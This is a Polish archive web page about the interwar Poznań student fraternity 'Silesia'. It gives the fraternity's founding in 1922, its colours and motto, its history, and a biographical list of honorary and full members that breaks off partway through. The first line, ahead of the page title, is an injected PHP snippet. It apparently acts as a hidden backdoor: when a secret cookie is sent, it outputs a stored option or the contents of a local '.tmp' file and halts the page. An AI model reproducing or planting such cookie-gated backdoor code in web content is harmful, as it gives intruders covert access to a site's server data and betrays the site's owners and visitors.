if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Silesia

Dekiel Czesława Rymera Nazwa:
Korporacja “Silesia”
Siedziba:
Poznań
Data powstania:
2 I 1922 r.
Barwy:
biała – błękitna – złota
Dewiza:
„Fortes fortuna adiuvat”, („Mocnym sprzyja los”)

Rys historyczny

Bandy prezydialna (?) oraz bandy rycerska i frakowa Erwina Makowskiego oraz fuksowska Eugeniusza Kruzy.

Silesia została założona dnia 2 I 1922 r. z inicjatywy K! Polonia przez grupę studentów Uniwersytetu Poznańskiego pochodzących z Górnego Śląska. Była pierwszą śląską korporacją akademicką powstałą w dwudziestoleciu międzywojennym. Skupiała akademików śląskich, a jej szczególnym celem było “krzewienie wśród społeczeństwa polskiego zamiłowania do ziemi śląskiej i praca nad jej spolszczeniem”. Jak napisano w jednym z okolicznościowych tekstów “Z natury rzeczy zatem działalność ta ujęta być musi w pewne ramy organizacyjne, odpowiednikiem jej jest Konwent activitas w Poznaniu i Konwent Seniorów z siedzibą w Katowicach”.

Szarfa prezydialna Erwina Makowskiego.
W czerwcu 1923 r. Senat Uniwersytetu zatwierdził statut korporacji. Kuratorami z ramienia uczelni byli początkowo prof. Jan Sajdak, a następnie prof. Zygmunt Wojciechowski.

Od 1922 r. Silesia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 4 V 1922 r.). Kandydowała pod opieką K! Magna-Polonia. W 1922 r. uzyskała prawa członka rzeczywistego Związku. W ramach Związku korporacja wchodziła w skład kartelu korporacji śląskich.

Pamiątkowy talerz Silesii, lata 30-te.

Silesia była największą w Polsce korporacją śląską i należała do największych korporacji akademickich w Poznaniu. W 1924 r. powstał Konwent Seniorów z siedzibą w Katowicach, a w 1925 r. nastąpiło poświęcenie sztandaru korporacji. Corocznie w początkach stycznia organizowano w Katowicach bale Silesii.

Silesia zawarła w 1934 r. kartel z K! Varsovia z Warszawy.

Filiżanka w barwach i z herbem Silesii, lata 30-te.
Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 188 nazwisk, w tym 32 członków honorowych. W 1932 r. korporacja liczyła 132 osoby, w tym 28 członków honorowych.

W okresie powojennym odbywały się w Katowicach nieoficjalne spotkania członków Korporacji.

Poczet sztandarowy Silesii, lata 30-te.

Lista członków

Poniższa, niekompletna lista członków Silesii obejmuje ponad 180 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Feliks Bocheński, ( - przed 1935) dr prawa, w 1920 organizator polskiego sądownictwa na Górnym Śląsku, prezes Sądu Apelacyjnego w Katowicach, działacz społeczny, m.in. prezes Towarzystwa Przyjaciół Teatru Polskiego w Katowicach, Filister honorowy Silesii
 2. Emil Cyran, (20 października 1886 w Bogunicach - 1966) - dr med., neurolog, Filister honorowy Silesii, w 1956 dyrektor Szpitala Psychiatrycznego w Lublińcu

  Kazimierz Czapla.

 3. Kazimierz Czapla, (16 lipca 1869 w Chełmnie - 5 października 1930 w Katowicach) s. Franciszka i Pelagii z Rzepnikowskich, ojciec Witolda (Silesia), student prawa w Berlinie i Wrocławiu, od 1896 adwokat, działacz społeczny i narodowy, m.in. Towarzystwa Gimnastycznego “Sokół”, Związku Śląskich Kół Śpiewaczych, Towarzystwa Pomocy Naukowych, Polskiego Towarzystwa Ludowego, po I wojnie światowej polski działacz plebiscytowy, współzałożyciel Chrześcijańskiego Zjednoczenia Ludowego, współzałożyciel i pierwszy przewodniczący Izby Adwokackiej w Katowicach, Filister honorowy Silesii

 4. Teofil Golus, (24 lutego 1886 w Miedźnej k. Pszczyny - 21 maja 1965) s. Tomasza i Jadwigi, absolwent Gimnazjum w Pszczynie 1908, studiował med. we Wrocławiu, Monachium i w Lipsku, lekarz w armii niemieckiej 1915-19, dr med. Berlin 1919, internista, uczestnik powstań śląskich, po wojnie lekarz kolejowy, lekarz Spółki Brackiej i Kasy Chorych w Pszczynie, radny miejski i przewodniczący Rady Miasta w Pszczynie, Filister honorowy Silesii, po wybuchu II wojny światowej wysiedlony, majątek skonfiskowano, uczestnik powstania warszawskiego, po wojnie naczelny lekarz US w Katowicach 1945-46, a później w NBP i Zjednoczeniu Zakładów Metali Nieżelaznych, odznaczony m.in. Orderem Polonia Restituta, Śląską Wstęgą Waleczności z Gwiazdą I kl., Medalem Niepodległości, Śląskim Krzyżem Powstańczym
 5. Grabianowski, inż., Filister honorowy Silesii
 6. Bronisław Emil Hager, (30 stycznia 1890 w Miłosławiu - 30 czerwca 1969 w Tarnowskich Górach) s. Maksymiliana i Karoliny z Urbanowskich, student i absolwent med. UJ 1914, dr med., internista, komisarz plebiscytowy na powiat zabrski, w czasie III powstania śląskiego lekarz w Pułku im. Stefana Czarnieckiego, po przyznaniu Zabrza Niemcom przeniósł się do Tarnowskich Gór, organizator służby zdrowia w Tarnowskich Górach, wiceburmistrz Tarnowskich Gór, Filister honorowy Silesii, uczestnik wojny obronnej 1939, po wojnie w 1946 wrócił do kraju, lekarz w Tarnowskich Górach, pochowany na Cmentarzu w Zabrzu
 7. Jan Hlond, dr med., dermatolog, Filister honorowy Silesii [prawd. Jan Paweł (15 czerwca 1888 w Starym Chorzowie - 1940) s. Jana i Marii z d. Imiela, brat kard. Augusta Hlonda, absolwent Gimnazjum w Pszczynie, student med. w Wiedniu i Wrocławiu, od 1914 lekarz w armii pruskiej, dr med. UWr. 1918, oficer rez., w rosyjskiej niewoli w Starobielsku, zginął]
 8. Chrystjan Jurek, Filister honorowy Silesii [prawd. Chrystian Jurek (24 grudnia 1877 - 15 sierpnia 1938) s. Jana i Marii z d. Heine]
 9. Jan Kempka, dr prawa, adwokat, starosta w Mysłowicach, Filister honorowy Silesii
 10. Józef Kędzior, dyrektor banku, Filister honorowy Silesii
 11. Józef Kiedroń, (23 marca 1879 w Błędowicach Dolnych (obecnie Hawierzowa) na Śląsku Cieszyńskim - 25 stycznia 1932 w Berlinie), inż. górnik, prezes i członek rad nadzorczych kopalń, w 1931 dyrektor Huty Królewskiej i Laura w Katowicach, działacz narodowy i oświatowy na Śląsku Cieszyńskim, w 1918 zainicjował powstanie Rady Narodowej Śląska Cieszyńskiego oraz opracował projekt przyłączenia tej dzielnicy do Polski, minister Przemysłu i Handlu w gabinecie Władysława Grabskiego 1923-25, Filister honorowy Gnomii i Silesii, pochowany na ewangelickim Cmentarzu w Cieszynie

  Stanisław Kobyliński, 1932 r.

 12. Stanisław Kobyliński, (27 września 1872 w Kijewie w pow. Chełmno - 14 maja 1937 w Katowicach) s. Franciszka i Zofii z d. Kalkstein, prawnik, adwokat, prezes dzielnicy śląskiej “Sokoła” 1922-23, działacz społeczny i polityczny, m.in. wiceprzewodniczący Rady Miejskiej w Katowicach, senator RP, członek Śląskiej Rady Wojewódzkiej, prezes Oddziału Związku Adwokatów Polskich w Katowicach, Filister honorowy Silesii i Prezes Koła Seniorów, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA

 13. Michał Kołoczek, (15 września 1887 w Goczałkowicach w pow. pszczyńskim - 3 listopada 1951 w Wirku) absolwent Gimnazjum w Gliwicach, członek Towarzystwa Tomasza Zana, student teologii, a następnie med. w Lipsku, Strasburgu, Wrocławiu, dr med. UWr. 1916, internista, powstaniec wielkopolski i śląski, w 1939 naczelny lekarz Spółki Brackiej w Tarnowskich Górach, działacz społeczny, Filister honorowy Silesii, skarbnik Koła Seniorów Silesii 1932, po wojnie lekarz Spółki Brackiej w Tarnowskich Górach oraz lekarz US w Wirku, odznaczony m.n. Krzyżem Niepodległości

  Wojciech Korfanty, 1932 r.

 14. Wojciech Korfanty, (20 kwietnia 1873 w Sadzawce [obecnie Siemianowice Śląskie] - 17 sierpnia 1939 w Katowicach), z rodziny górniczej, s. Józefa i Karoliny z d. Klecha, ojciec Witolda (Lauda i Vratislavia), uczeń Gimnazjum Królewskiego w Katowicach, relegowany za wyrażaniu negatywnych opinii o Bismarcku, studiował 1895-1901 na Politechnice w Charlottenburgu, Wydziale Filozoficznym Uniwersytetu we Wrocławiu oraz w Berlinie, działacz społeczny i polityczny, członek Ligi Narodowej 1901-08, od 1901 red. naczelny “Górnoślązaka”, osadzony przez władze pruskie w więzieniu we Wronkach 1902, poseł polski do Reichstagu 1903-12 i 1918 oraz pruskiego Landtagu 1903-18, członek rządu powstania wielkopolskiego - Naczelnej Rady Ludowej 1918-19, w 1920 Polski Komisarz Plebiscytowy na Górnym Śląsku, dowódca III powstania śląskiego 1921, poseł na Sejm RP 1922-30 z ramienia Chrześcijańskiej Demokracji, w 1923 wicepremier w rządzie Wincentego Witosa, od 1924 wydawał dzienniki “Rzeczpospolita” i “Polonia”, w 1930 osadzony wraz z posłami Centrolewu w twierdzy brzeskiej, poseł na Sejm Śląski oraz senator RP III kadencji, w latach 1935-39 na emigracji, jeden z założycieli Frontu Morges, a następnie organizator i prezesem Stronnictwa Pracy, po powrocie do Polski w kwietniu 1939 aresztowany i osadzony przez władze sanacyjne na Pawiaku, zwolniony ciężko chory dopiero w lipcu 1939, Protektor Korporacji Silesia, Filister honorowy Laudy, odznaczony m.in. czterokrotnie Krzyżem Walecznych 1922 oraz pośmiertnie Orderem Orła Białego 1997

 15. Stanisław Kowalski, (11 listopada 1897 w Orzechowie pow. Września - ) absolwent Gimnazjum Realnego w Hamborn n./R, studiował w Bonn 1918-19 i Marburgu 1919-20 oraz UP 1920-27, dr med. 1928, c. 1920 Magna-Polonia, wiceprezes sem. zim. 1922/23, olderman 1920 i 1921, pierwszy prezes h.c. K! Silesia sem. let. 1921/22, w 1930 lekarz w Krzywiniu pow. Kościan, a w 1939 w Kościanie

  Brunon Kudera, 1932 r.

 16. Brunon Kudera, (18 czerwca 1876 w Mysłowicach - 11 lutego 1940 we Lwowie) ojciec Stefana (Silesia), absolwent prawa UWr. 1903, działacz Towarzystwa Akademików Górnoślązaków, dr praw, adwokat, śląski działacz społeczno-polityczny, m.in. Związku Gimnastycznego „Sokół”, Zjednoczenia Zawodowego Polskiego, Związku Inteligencji Polskiej na Górnym Śląsku, przewodniczący Towarzystwa Przyjaciół Nauk na Śląsku, dyrektor Uniwersytetu Ludowego w Bytomiu, członek Rady Nadzorczej spółki czasopisma „Katolik”, w 1919 wybrany do rady miejskiej Bytomia i przewodniczący polskiego klubu radnych, po przyznaniu Bytomia Niemcom przeniósł się do Mysłowic, radny Tymczasowej Rady Wojewódzkiej Województwa Śląskiego, w 1927 wybrany na wiceburmistrza Mysłowic, Filister honorowy Silesii, członek zarządu Koła Seniorów Silesii 1932, w 1939 uwięziony przez Rosjan i osadzony w obozie w Charkowie, w 1940 w stanie załamania nerwowego zwolniony z obozu, zmarł kilka dni później

 17. Jan Mildner, ( - lata 60-te) prawnik, adwokat, starosta katowicki, Filister honorowy Silesii
 18. Tomisław Morawski, (31 lipca 1881 - 1946 w Tuluzie), absolwent Akademii Górniczej we Freibergu 1904, po studiach pracował w górnictwie, od 1924 wiceprezes Wojewódzkiego Urzędu Górniczego w Katowicach, generalny dyrektor Sp. Akc. “Lignoza” w Katowicach 1924-31, od 1931 generalny dyrektor Rybnickiego Gwarectwa Węglowego oraz Gwarectwa Węglowego Charlotte (od czasu fuzji obu Gwarectw), doktor h.c. Akademii Górniczej w Krakowie 1937, Filister honorowy Silesii, we wrześniu 1939 wyjechał przez Rumunię do Francji
 19. Bolesław Mroczkowski, ( - po 1945) prawnik, adwokat, Filister honorowy Silesii, zginął potrącony przez samochód
 20. Stanisław hr. Niegolewski, ( - przed 1935) starosta lubiniecki, Filister honorowy Silesii
 21. Teodor Obremba (Oremba), (24 lipca 1890 w Pogórzu k. Prudnika - 9 maja 1951 w Katowicach) s. Teodora i Franciszki z Lubczyków, wydalony z Gimnazjum w Gliwicach za przynależność do Towarzystwa Tomasza Zana, absolwent Gimnazjum w Wittsocku w Brandenburgii, student i absolwent 1920 med. UWr., dr med., dermatolog, działacz plebiscytowy, po wojnie lekarz w Mysłowicach, chadecki działacz polityczny, przewodniczący Rady Miejskiej Mysłowic 1926-39, poseł na II Sejm Śląski, Filister honorowy Silesii, w czasie okupacji współpracował z ruchem oporu, po wojnie lekarz kolejowy w Katowicach, pochowany w Katowicach

  Paweł Piechaczek, 1932 r.

 22. Paweł Piechaczek, brat Alojzego (Silesia), dr med., internista, Filister honorowy Silesii

 23. Jan Piechulok (Piechulka), dr, Filister honorowy Silesii [prawd. Jan Stefan Piechulek (1872-1944), s. Franciszek i Emilii z d. Klipper, bankowiec, działacz narodowy, publicysta, poseł]
 24. Jan Potyka, dr praw, starosta, dyrektor Spółki Brackiej, Filister honorowy Silesii
 25. Józef Rostek, ( - 1929), student prawa UWr., założyciel Towarzystwa Górnoślązaków we Wrocławiu, dr praw, notariusz, I Prezes Koła Przyjaciół Harcerstwa, publicysta, wydawca gliwickiego dziennika “Głos Śląski”, członek Ligi Narodowej, Filister honorowy Silesii

  Jan Sajdak, 1932 r.

 26. Jan Sajdak, (26 lutego 1882 w Burzynie k. Tuchowa - 22 kwietnia 1967 w Poznaniu) ojciec Jana i Stefana (Silesia), filolog klasyczny, bizantynolog, doc. UJ, prof. UJK 1916-19, prof. 1919-33 i od 1946 i rektor 1931/32 UP, członek PAU, kurator i Filister honorowy Silesii, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, autor wielu prac naukowych, m.in. redaktor wielotomowego wydawnictwa “Pisma ojców Kościoła”

 27. Tadeusz Stark(a), notariusz, sędzia, prezes Sądu Apelacyjnego w Poznaniu, prezes Sądu Apelacyjnego w Katowicach, Filister honorowy Silesii
 28. Aleksander hr. Szembek, (12 stycznia 1886 w Siemianicach - 2 lutego 1928 w Paryżu) z rodziny ziemiańskiej, s. Piotra i Marii z Fredrów, absolwent Gimnazjum w Ostrowie Wlkp., studiował we Wrocławiu, Lipsku, Belgii i Francji, w 1918 uczestnik Sejmu Dzielnicowego w Poznaniu, do 1926 radca ambasady polskiej w Paryżu, Filister honorowy Silesii, pochowany w rodzinnej krypcie kościoła w Siemianicach
 29. Maksymilian Brunon Wilimowski, (7 października 1886 w Siemianowicach Śląskiej - 3 lipca 1951 w Jastrzębiu Zdroju) s. Józefa i Anny z d. Rutkowska, absolwent Gimnazjum w Katowicach, członek Towarzystwa Tomasza Zana, student i absolwent med. UWr. 1907-14, asystent w Klinice Chirurgii UWr., dr med. UWr. 1919, chirurg, działacz plebiscytowy i powstaniec śląski, kierownik Głównego Szpitala Wojsk Powstańczych w Mysłowicach 1921, od 1922 dyrektor i ordynator Oddziału Chirurgicznego Szpitala oo. Bonifratrów w Bogucicach, a od 1927 do 1939 oraz od 1945 do 1951 Szpitala Miejskiego w Katowicach, Filister honorowy Silesii, przewodniczący Śląskiego Towarzystwa Lekarskiego 1945-51, odznaczony m.in.: Krzyżem Kawalerskim OOP, Złotym Krzyżem Zasługi, Krzyżem na Śląskiej Wstędze Waleczności i Zasługi, Śląskim Krzyżem Powstańczym, pochowany na Cmentarzu przy ul. Francuskiej w Katowicach, jego imieniem nazwano jedną z ulic w Katowicach
 30. Klemens Wnukowski, prawnik, adwokat, Filister honorowy Silesii

  Konstanty Wolny

 31. Konstanty Wolny, (5 kwietnia 1877 w Bujakowie k. Mikołowa - 9 listopada 1940 we Lwowie) s. Wawrzyńca (kowala) i Ludwiny z d. Jarczyk, szwagier Maksymiliana Wilimowskiego (Silesia), absolwent Gimnazjum przy Placu Wolności w Katowicach 1898, student i absolwent prawa UWr. 1898-1901, działacz Towarzystwa Akademików Górnoślązaków i Zet-u, odbył praktykę referendariusza i asesora w sądach w Trzebnicy, Świdnicy, Zgorzelcu, Wrocławiu, zdał egzamin sędziowski 1907, od 1907 pierwszy polski adwokat w Gliwicach, obrońca Polaków w procesach politycznych, m.in. polskich gimnazjalistów z Gliwic, radny miejski w Gliwicach 1909-15, opiekował się tajnym kółkiem TTZ, po wybuchu pierwszej wojny światowej internowany w twierdzy w Nysie, po pewnym czasie zwolniony, w 1915 powołany do wojska pruskiego do służby pozafrontowej, stacjonował w Janowie Podlaskim w stopniu szeregowca (pracował w lazarecie koni i jako tłumacz w sztabie), pomagał mieszkańcom, za co w dowód uznania jedna z ulic w Janowie została nazwana jest imieniem i nazwiskiem, w listopadzie 1918 zdemobilizowany, po powrocie z wojny osiedlił się w Bytomiu, działacz plebiscytowy, m.in. zastępca przewodniczącego Podkomisariatu NRL dla Górnego Śląska 1918-19, w 1919 kierował pracami Sekretariatu Plebiscytowego, uczestniczył w powstaniach śląskich, w dwudziestoleciu prowadził kancelarię adwokacką i notarialną w Katowicach, dziekan Rady Adwokackiej w Katowicach, chadecki działacz polityczny, twórca autonomicznego statutu Województwa Śląskiego, poseł i trzykrotnie marszałek Sejmu Śląskiego 1922-1935, Filister honorowy Silesii, po śmierci Stanisława Kobylińskiego prezes Konwentu Seniorów Silesii, w obawie przed aresztowaniem Przez Niemców we wrześniu 1939 ewakuował się do Lwowa, gdzie zmarł, pochowany w grobowcu oo. Jezuitów na Cmentarzu Janowskim we Lwowie (nr 89, parcela 32, nr porządkowy 65258), w 2012 prochy sprowadzono do Katowic, odznaczony m.in. Krzyżem Komandorskim Orderu Polonia Restituta [Źródła (poza wskazanymi poniżej spisu członków): relacja wnuka Konstantyna Mariana Wolnego]

 32. Jan Wyglenda, (24 listopada 1894 w Brzeźnicy - 1973 w Rybniku) działacz plebiscytowy, uczestnik powstań śląskich i dowódca powstańczy, m.in. zastępca głównego komendanta i kierownika Wydziału Wywiadu POW Górnego Śląska, w III powstaniu śląskim zastępca dowódcy i szef sztabu Grupy “Północ”, w 1927 naczelnik gminy Nowa Wieś - Wirek, a następnie starosta powiatowy w Lublińcu, Rybniku, członek Związku Powstańców Śląskich, Filister honorowy Silesii i Slensanii, uczestnik wojny obronnej 1939 oraz PSZ na Zachodzie, po powrocie do kraju więzień stalinowski 1950-56, po uwolnieniu pracował w górnictwie, pochowany w Rybniku
 33. Wiktor Zając, (1 października 1886 w Ligocie Bialskiej w pow. prudnickim - 6 kwietnia 1952) z rodziny chłopskiej, s. Karola i Marii z d. Lompa, absolwent Gimnazjum w Prudniku, studiował med. we Wrocławiu, Lipsku i Monachium, dr med. Lipsk 1914, w armii niemieckiej 1916-18, w niewoli angielskiej 1918, od 1919 w armii polskiej gen. Józefa Hallera we Francji, powstaniec śląski, naczelny lekarz Szpitala Spółki Brackiej w Rudzie Śląskiej 1925-34, a następnie w Rydułtowach, Filister honorowy Silesii, w czasie wojny wysiedlony do tzw. Generalnej Guberni, po wojnie ponownie naczelny lekarz Spółki Brackiej w Rydułtowach, pochowany na Cmentarzu w Rydułtowach

Członkowie rzeczywiści

 1. Ferdynand Adamczyk, (13 września 1896 w Uchylsku k. Rybnika - 23 stycznia 1988 w Katowicach) z rodziny chłopskiej, s. Antoniego i Anny z Adamczyków, absolwent Gimnazjum w Zabrzu, polski działacz plebiscytowy na Górnym Śląsku, walczył i został ranny w III powstaniu śląskim, studiował med. we Wrocławiu, Krakowie i Poznaniu, dr med. UP 1925, internista, po studiach m.in. ordynator oddziału wewnętrznego Szpitala Bonifratrów w Katowicach, w 1939 uczestniczył w obronie Katowic, w konspiracji szef służby sanitarnej organizacji “Ku wolności”, a następnie członek Polskiego Związku Wolności, w 1944 aresztowany przez Niemców, zbiegł z transportu, po wojnie lekarz w Katowicach, pochowany na Cmentarzu przy ul. Francuskiej w Katowicach, odznaczony m.in. Krzyżem Kawalerskim OOP
 2. Lucjusz Bendkowski, c. ok. 1931
 3. Bernard, pierwszy olderman sem. let. 1921/22

  St. Bielawny, 1936/37 r.

 4. St. (Stanisław ?) Bielawny, c. 1936/37

 5. Feliks Bortel, ( - 20 lutego 1992) mgr praw, sędzia, prezes Sądu Rejonowego

  Roman Borzysławski, 1932 r.

 6. Roman Borzysławski, ( - ok. 1970)

 7. Ludwik Brandys, (1902-1988) członek Sądu Koleżeńskiego Bratniej Pomocy Studentów UP, mgr prawa

  Adolf Broy, 1937 r.

 8. Adolf Broy, (1912 - 28 lipca 1999) brat Józefa (Silesia) oraz Juliana (Wisła), student i absolwent med. UP, c. ok. 1931, prezes sem. let. 1936/37, dr med., chirurg, pochowany na Cmentarzu przy ul. Francuskiej w Katowicach

 9. Józef Broy , (1900-1992) brat Adolfa (Silesia) oraz Juliana (Wisła), prawnik, adwokat
 10. Franciszek Ciżewski,
 11. Augustyn Cofała,

  Wiktor Czapla, 1928 r. (?).

 12. Witold Franciszek Antoni Czapla, (2 lutego 1906 w Bytomiu - 7 maja 1958 w Orzegowie) z rodziny szlacheckiej, s. Kazimierza (Silesia) i Marii z d. Szeliska, absolwent Gimnazjum w Katowicach 1924, studiował med. UP 1925-28, UJ 1928/29 oraz na Uniwersytecie w Innsbrucku 1929-31, absolwent UP 1937, prezes 1927, dr med., internista, po studiach lekarz w Mysłowicach, ppor. rez., ciężko ranny pod Pacanowem, jako inwalida wojenny zwolniony z niewoli, w czasie wojny lekarz w Orzegowie, po wojnie lekarz, internista i rentgenolog, członek PPS 1945-48, później bezpartyjny, działacz społeczny, pochowany w grobie rodzinnym w Katowicach, jego nazwiskiem w 1959 nazwano jedną z ulic w Rudzie Śląskiej

 13. Witold Czarnecki, wiceprezes 1930/31, mgr ekonomii, po wojnie na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu

  Władysław Czechowski, 1932 r.

 14. Władysław Czechowski, student i absolwent prawa UP, prezes 1930/31, członek Poznańskiego Komitetu Akademickiego 1929, wiceprezes Konferencji Środ. Kół Naukowych 1929/30, członek sądu koleżeńskiego Młodzieży Wszechpolskiej 1929/30

  Marian Czerski, 1932 r.

 15. Marian Czerski, sekretarz Bratniej Pomocy Studentów UP 1931/32, członek Zarządu Głównego Związku Młodych Narodowców, prezes Służby Młodych OZN na Śląsku 1938/39, mgr praw

 16. Józef Czok,
 17. Franciszek Czubek, mgr historii
 18. Alfons Czupryna, (1914-1978)
 19. Zacheusz Dombek [Dąbek], (23 sierpnia 1901 w Syryni k. Wodzisławia - 13 września 1983) w okresie gimnazjalnym działacz polskich organizacji narodowych i oświatowych na Śląsku, uczestnik akcji propagandowych w okresie plebiscytu, a także II i III powstania śląskiego, student i absolwent prawa UP 1922-25, po ukończeniu aplikacji sędzia grodzki w Wodzisławiu Śląskim, od 1931 adwokat do września 1939 w Rybniku, członek Stronnictwa Narodowego, w początkach okupacji 1939 aresztowany przez Niemców, zwolniony, ukrywał się na terenie Generalnej Guberni, po zakończeniu wojny w 1945 osiedlił się w Opolu, gdzie praktykował jako adwokat, w latach 1949-55 ze względu na stan zdrowia nie pracował, w 1955-56 radca prawny w przedsiębiorstwie w Brzegu nad Odrą, od 1956 do emerytury w 1971 adwokat w Raciborzu [Źródła (poza wskazanymi poniżej spisu członków): J. Polewka, Początki i rozwój adwokatury polskiej na Górnym Śląsku, Katowice 2005]
 20. Robert Danecki, ( - 1939-45) wiceprezes sem. zim. 1936/37, wiceprezes sem. zim. 1937/38 i sem. let. 1938/39, zginął na wojnie
 21. Wojciech Dobrowolski, dr [prawd. Wojciech Dobrowolski (23 kwietnia 1901 w Inowrocławiu - ) student i absolwent 1928 med. UP, w 1956 lekarz w Bydgoszczy]

  Augustyn Durynek, koniec lat 20-tych (?).

 22. Augustyn Durynek, (1907-1981) prawnik, adwokat w Żorach

  Józef Dyrgała, 1932 r.

 23. Józef Dyrgała, mgr prawa

 24. Piotr Dziwok, skreślony 1931/32
 25. Kurt Gabriel [po wojnie Karol Henryk Gabriel], (25 sierpnia 1910 w Gliwicach - 30 października 1979 w Kuźni Raciborskiej) s. Makrymiliana (urzędnika pocztowego, absolwent Gimnazjum w Pszczynie, studnet med. UP 1930-32 (?), odbył służbę wojskową w Szkole Podchorążych w Zambrowie, od 1935 pracownik Starostwa Grodzkiego w Chorzowie, działacz Polskiego Związku Zachodniego, w 1939 uciekł na Węgry, skąd przedostał się Francji, żołnierz PSZ na Zachodzie, służył w I Dywizji Pancernej gen. S. Maczka, m.in. dowódca plutonu w Batalionie Strzelców Podhalańskich pod Caen i Falaise, ciężko rannny, awansowany do stopnia ppor., w 1946 wrócił do kraju, pracował na różnych stanowiskach w kopalniach Dębieńsko, Jastrzębie, Marcel i Raciborskiej Fabryce Wyrobów Metalowych, po wojnie zmienił imiona na Karol Henryk
 26. Mieczysław Gacka, ( - lata 50-te) prawnik, adwokat
 27. Roman Gaj, ( - 70-te)

  Teodor Glensk, 1929 r.

 28. Teodor Glensk, (6 listopada 1901 - 22 sierpnia 1942 w Auschwitz) z Opolszczyzny, prezes 1924/25, prezes PKM-u, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, prezes Poznańskiego Komitetu Akademickiego 1926, dwukrotny prezes Bratniej Pomocy UP 1924-26, mgr praw, organizator OWP w Poznańskiem, w ZG Obozu Wszechpolskiego 1939, dyrektor biura Sejmu Śląskiego, członek śląskiej Delegatury Rządu, rozstrzelany w obozie koncentracyjnym

 29. Karol Goletz, wiceprezes PKM 1930/31, skreślony 1931/32, przewodniczący Komisji Rewizyjnej Bratniej Pomocy Studentów UP 1930/31

  Józef Górecki, 1935 r.

 30. Józef Górecki, ( - 1978 w Dallas) wiceprezes sem. let. 1936/37, mgr praw, po wojnie na emigracji w Stanach Zjednoczonych

  Edmund Gryglewicz, 1929 r.

 31. Edmund Gryglewicz, (6 grudnia 1906 w Raciborzu - lata 70-te) student i absolwent 1934 med. UP, prezes 1929/30, asystent na Uniwersytecie Poznańskim, dr med. UWr. 1946, internista, w 1956 lekarz w Szopienicach

 32. Marceli Gwóźdź, (1908 - 1978?) prawnik, adwokat
 33. Henryk Hulok, c. ok. 1931
 34. Hieronim Jajor, c. ok. 1931

  Henryk Janus, 1934/35 r.

 35. Henryk Janus, prezes sem. zim. 1934/35, mgr praw, po wojnie starosta w Opolu

  Zbigniew Jerzykiewicz, 1936/37 r.

 36. Zbigniew Jerzykiewicz, (1914? - 1980) c. 1936/37, mgr ekonomii

 37. Zygmunt Jesionowski,

  Wincenty Jońca, 1936/37 r.

 38. Wincenty Jońca, c. 1936/37, prezes sem. let. 1938/39, po wojnie na emigracji w Wielkiej Brytanii

  J. Klak, 1936/37 r.

 39. J. Klak, c. 1936/37

 40. Paweł Kałuża,
 41. Tomasz Kapica, asystent UP

  Tadeusz Karczewski, 1926 r.

 42. Tadeusz Karczewski, założyciel Silesii, dr prawa, adwokat, Filister meritus Silesii, sekretarz Konwentu Seniorów, burmistrz Mysłowic

 43. Paweł Kawalec, mgr prawa
 44. Adam Kaźmierczak, (1903 - 9 września 1993) c. 1925, absolwent Wydziału Prawno-Ekonomicznego UP
 45. Karol Kaźmierowski,
 46. Jan Kiser, c. ok. 1931
 47. Stefan Klonowski, c. ok. 1931, skreślony 1931/32
 48. Felicjan Kmiotek, (1913-1999) c. 1931/32, prawnik, adwokat
 49. Joachim Knechtel,

  Edward Kołodziej, 1929 r.

 50. Edward Kołodziej, założyciel, prezes 1925/26 i 1927/28, prezes SN na Śląsk, w KG SN 1936-39, po wojnie na emigracji w Wielkiej Brytanii, członek Rady Stronnictwa Narodowego w Wielkiej Brytanii

 51. Henryk Kontny, dr med., internista

  Paweł Kopocz, 1932 r.

 52. Paweł Kopocz, (9 czerwca 1898 w Starej Wsi k. Pszczyny - 1971 w Katowicach-Ligocie), absolwent Gimnazjum w Bytomiu, studiował prawo i ekonomię we Wrocławiu i Poznaniu, w czasie wojny 1917-18 w armii niemieckiej, uczestnik trzech powstań śląskich, kierował akcją plebiscytową w powiecie Strzelce Opolskie, założyciel Silesii, sędzia, adwokat i działacz polityczny, poseł do sejmu w Katowicach 1930 i Warszawie 1930-35, Filister meritus Silesii, wiceprezes Koła Seniorów Silesii 1932, po wojnie na emigracji w Wielkiej Brytanii, w 1968 wrócił do kraju

  Wiktor Kościelny, 1936/37 r.

 53. Wiktor Kościelny, ( - 1939-45) c. 1936/37, prawnik, zastrzelony przez Niemców

 54. Ryszard Kowalski, c. ok. 1931, skreślony 1931/32
 55. Karol Kozłowski,
 56. Ludwik Kozłowski, założyciel Silesii, pierwszy skarbnik sem. let. 1921/22, prawnik, adwokat, Filister meritus Silesii
 57. Roman Koźlik, mgr praw, dyrektor banku, pochowany w Katowicach

  Eugeniusz Kruza, 1932 r.

 58. Eugeniusz Krauze (po wojnie Kruza), (28 marca 1910 w Wiedniu - 12 listopada 1986) s. Franciszka i Matyldy, student i absolwent 1938 farmacji UP, c. ok. 1931, olderman, wiceprezes Koła Farmaceutów UP, ppor. rez., w wojnie obronnej 1939 kierownik szpitala polowego, w 1943 aresztowany przez Niemców za nielegalne dostarczanie leków Polakom, osadzony w różnych więzieniach, ostatecznie w obozie Leunawercke w Merseburgu k. Halle, po wojnie dzierżawca, właściciel, a w końcu po jej nacjonalizacji kierownik apteki w miejsc. Zawadzkie na Opolszczyźnie, w 1949 powrócił do nazwiska rodzinnego “Kruza” (w czasie zaborów zmienionego na “Krauze”), działacz społeczny, m.in. przewodniczący Rady Związków Zawodowych Pracowników Służby Zdrowia, radny Miejskiej Rady Narodowej w Zawadzkim, prezes Polskiego Związku Zachodniego w Zawadzkim, redaktor naczelny “Opolskiego Biuletynu Farmaceutycznego”, odznaczony m.in. Krzyżem Kawalerskim OOP, Złotym Krzyżem Zasługi, Medalem Ignacego Łukaszewicza

  Piotr Krusze, 1934/35 r.

